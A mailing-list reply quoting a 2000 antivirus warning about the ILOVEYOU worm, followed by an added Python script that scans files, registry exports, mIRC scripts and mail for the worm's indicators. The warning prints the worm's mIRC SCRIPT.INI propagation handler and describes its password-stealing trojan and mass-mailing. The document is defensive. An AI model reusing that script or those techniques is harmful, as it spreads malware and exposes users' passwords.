Thanks for the heads up re the virus, Hans, it looks like a nasty one.

tex

----- Original Message -----
From: "Hans van der Genugten" <[log in to unmask]>
To: <[log in to unmask]>
Sent: Thursday, May 04, 2000 11:34 AM
Subject: VIRUSWARNING: High risk e-mail virus "I love you"

> Virus Name: VBS/LoveLetter.worm
> Aliases: none known
> Date Discovered: Thursday May 4th 2000
> DAT included: 4077
> Risk: High
>
> Characteristics:
>
> This worm is a VBS program that is sent attached to an email with the
> subject ILOVEYOU.
> The mail contains the message "kindly check the attached LOVELETTER coming
> from me."
> The attachment is called LOVE-LETTER-FOR-YOU.TXT.vbs
> If the user runs the attachment the worm runs using the Windows Scripting
> Host program. This is not normally present on Windows 95 or Windows NT
> unless Internet Explorer 5 is installed.
>
> When the worm is first run it drops copies of itself in the following
> places :-
>
> C:\WINDOWS\SYSTEM\MSKERNEL32.VBS
> C:\WINDOWS\WIN32DLL.VBS
> C:\WINDOWS\SYSTEM\LOVE-LETTER-FOR-YOU.TXT.VBS
>
> It also adds the registry keys :-
> HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\
> MSKernel32=C:\WINDOWS\SYSTEM\MSKernel32.vbs
> HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices\
> Win32DLL=C:\WINDOWS\Win32DLL.vbs
> in order to run the worm at system start-up.
>
> The worm replaces the following files :-
> *.JPG
> *.JPEG
> *.MP3
> *.MP2
> with copies of itself and it adds the extension .VBS to the original
> filename. So PICT.JPG would be replaced with PICT.JPG.VBS and this would
> contain the worm.
>
> The worm also overwrites the following files :-
> *.VBS
> *.VBE
> *.JS
> *.JSE
> *.CSS
> *.WSH
> *.SCT
> *.HTA
> with copies of itself and renames the files to *.VBS.
>
> The worm creates a file LOVE-LETTER-FOR-YOU.HTM which contains the worm and
> this is then sent to the IRC channels if the mIRC client is installed. This
> is accomplished by the worm replacing the file SCRIPT.INI with the following
> script :-
>
> [script]
> n0=on 1:JOIN:#:{
> n1= /if ( $nick == $me ) { halt }
> n2= /.dcc send $nick C:\WINDOWS\SYSTEM\LOVE-LETTER-FOR-YOU.HTM
> n3=}
>
> After a short delay the worm uses Microsoft Outlook to send copies of itself
> to all entries in the address book.
> The mails will be of the same format as the original mail.
>
> This worm also has another trick up its sleeve in that it tries to download
> and install an executable file called WIN-BUGSFIX.EXE from the Internet.
> This exe file is a password stealing program that will email any cached
> passwords to the mail address [log in to unmask]
>
> In order to facilitate this download the worm sets the start-up page of
> Microsoft Internet Explorer to point to the web-page containing the password
> stealing trojan.
>
> The email sent by this program is as follows :-
> From: [log in to unmask]: [log in to unmask]: Barok... email.passwords.sender.trojan
> X-Mailer: Barok... email.passwords.sender.trojan---by: spyder
> Host: goat1
> Username: Goat1
> IP Address: 192.168.0.2
> RAS Passwords:...
> <password information goes here>
> ...
> Cache Passwords:...
> <password information goes here>
> ...
> goatserver.goatnet/goatserver.goatnet : GOATNET\goat1:
> MAPI : MAPI
>
> The password stealing trojan is also installed via the following registry
> key :-
> HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\WIN-BUGSFIX
> to auto run at system start-up.
>
> After it has been run the password stealing trojan copies itself to
> WINDOWS\SYSTEM\WinFAT32.EXE and replaces the registry key with
> HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\WinFAT32=WinFAT32.EXE
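A host and mail-gateway triage script for the indicators Hans's warning lists, added here as an example; it is not part of the original message and not vendor code. The file paths, registry entries, SCRIPT.INI text and attachment name it runs against are constructed samples, and the double-extension attachment rule generalises the single .TXT.vbs name in the warning to the other scripting-host extensions the worm overwrites:

```python
"""Host and mail triage for the VBS/LoveLetter indicators listed in the warning.

Added example, not part of the original message. All paths, registry entries and
the mail/script samples below are constructed for illustration.
"""
import re

# Files the warning says the worm (and the WIN-BUGSFIX trojan) drops. Windows paths
# are case-insensitive, so everything is compared in lower case.
DROPPED_FILES = {
    r"c:\windows\system\mskernel32.vbs",
    r"c:\windows\win32dll.vbs",
    r"c:\windows\system\love-letter-for-you.txt.vbs",
    r"c:\windows\system\love-letter-for-you.htm",
    r"c:\windows\system\winfat32.exe",
}

# Autostart keys and value names named in the warning.
AUTORUN_KEYS = {
    r"hkey_local_machine\software\microsoft\windows\currentversion\run",
    r"hkey_local_machine\software\microsoft\windows\currentversion\runservices",
}
AUTORUN_VALUES = {"mskernel32", "win32dll", "win-bugsfix", "winfat32"}

# Media files the worm replaces keep their name and gain .VBS (PICT.JPG -> PICT.JPG.VBS).
REPLACED_MEDIA = re.compile(r"\.(jpe?g|mp[23])\.vbs$", re.I)

# The mIRC SCRIPT.INI payload: an on-JOIN handler that DCC-sends the .HTM copy to whoever joins.
MIRC_DCC = re.compile(r"on\s+1:JOIN:#.*?dcc send \$nick\b.*?love-letter-for-you\.htm", re.I | re.S)

# Generalisation of the attachment name in the warning: a double extension ending in a
# Windows Scripting Host type (the warning itself only shows .TXT.vbs).
SCRIPT_DOUBLE_EXT = re.compile(r"\.[a-z0-9]{2,4}\.(vbs|vbe|js|jse|wsh|sct|hta)$", re.I)


def triage_files(paths):
    """Return (reason, path) for every path that is a known dropped file or a replaced media file."""
    hits = []
    for path in paths:
        low = path.lower()
        if low in DROPPED_FILES:
            hits.append(("dropped_file", path))
        elif REPLACED_MEDIA.search(low):
            hits.append(("replaced_media", path))
    return hits


def triage_autoruns(entries):
    """entries: (key, value_name, data) triples exported from the Run/RunServices keys.

    Flags the value names from the warning, plus any autostart that launches a .vbs at all,
    since a legitimate Run entry on a 2000-era host almost never does that.
    """
    hits = []
    for key, name, data in entries:
        if key.lower() in AUTORUN_KEYS and (name.lower() in AUTORUN_VALUES or data.lower().endswith(".vbs")):
            hits.append((name, data))
    return hits


def triage_mirc_script(script_ini_text):
    """True if a SCRIPT.INI carries the DCC-send handler shown in the warning."""
    return MIRC_DCC.search(script_ini_text) is not None


def triage_mail(subject, attachment_name):
    """Gateway-style rule: the ILOVEYOU subject together with a double-extension script attachment."""
    return subject.strip().upper() == "ILOVEYOU" and SCRIPT_DOUBLE_EXT.search(attachment_name) is not None


# --- constructed sample inventory (not taken from a real host) ---
SAMPLE_FILES = [
    r"C:\WINDOWS\SYSTEM\MSKernel32.vbs",
    r"C:\WINDOWS\Win32DLL.vbs",
    r"C:\My Documents\PICT.JPG.VBS",
    r"C:\My Documents\holiday.mp3.vbs",
    r"C:\My Documents\report.doc",
    r"C:\WINDOWS\SYSTEM\WinFAT32.EXE",
]
SAMPLE_AUTORUNS = [
    (r"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run", "MSKernel32", r"C:\WINDOWS\SYSTEM\MSKernel32.vbs"),
    (r"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices", "Win32DLL", r"C:\WINDOWS\Win32DLL.vbs"),
    (r"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run", "WinFAT32", "WinFAT32.EXE"),
    (r"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run", "SystemTray", "SysTray.Exe"),
]
SAMPLE_SCRIPT_INI = (
    "[script]\n"
    "n0=on 1:JOIN:#:{\n"
    "n1= /if ( $nick == $me ) { halt }\n"
    "n2= /.dcc send $nick C:\\WINDOWS\\SYSTEM\\LOVE-LETTER-FOR-YOU.HTM\n"
    "n3=}\n"
)

if __name__ == "__main__":
    for hit in triage_files(SAMPLE_FILES):
        print("file    ", *hit)
    for hit in triage_autoruns(SAMPLE_AUTORUNS):
        print("autorun ", *hit)
    print("mirc    ", triage_mirc_script(SAMPLE_SCRIPT_INI))
    print("mail    ", triage_mail("ILOVEYOU", "LOVE-LETTER-FOR-YOU.TXT.vbs"))
```

Run it as-is to see the hits on the constructed inventory, or feed triage_files a directory walk and triage_autoruns a registry export. One caveat for anyone checking by eye: with Explorer's default of hiding known extensions, PICT.JPG.VBS displays as PICT.JPG and LOVE-LETTER-FOR-YOU.TXT.vbs as LOVE-LETTER-FOR-YOU.TXT, so take the inventory from the file system rather than from displayed names.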